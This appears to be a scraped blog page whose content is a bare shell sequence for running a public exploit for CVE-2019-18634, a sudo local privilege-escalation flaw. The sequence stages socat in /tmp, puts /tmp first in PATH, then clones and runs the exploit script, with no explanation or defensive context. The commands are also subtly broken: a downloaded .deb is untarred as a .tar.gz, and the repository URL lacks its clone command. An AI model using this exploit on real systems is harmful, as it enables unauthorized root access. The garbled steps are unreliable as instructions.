cd /tmp
apt download socat 
tar zxvvf socat.tar.gz
dpkg -x socat/socat*.deb .
rm -rf socat
cp usr/bin/socat .
https://github.com/Plazmaz/CVE-2019-18634.git
cd CVE-2019-18634/src
export PATH=/tmp:$PATH
bash run.sh

 

相关文章:

  • 2022-12-23
  • 2022-03-08
  • 2021-05-17
  • 2021-09-20
  • 2021-10-30
  • 2021-09-10
  • 2021-07-10
  • 2021-11-20
猜你喜欢
  • 2021-12-04
  • 2021-12-25
  • 2022-01-10
  • 2021-07-17
  • 2021-10-17
  • 2021-06-27
  • 2021-10-23
相关资源
相似解决方案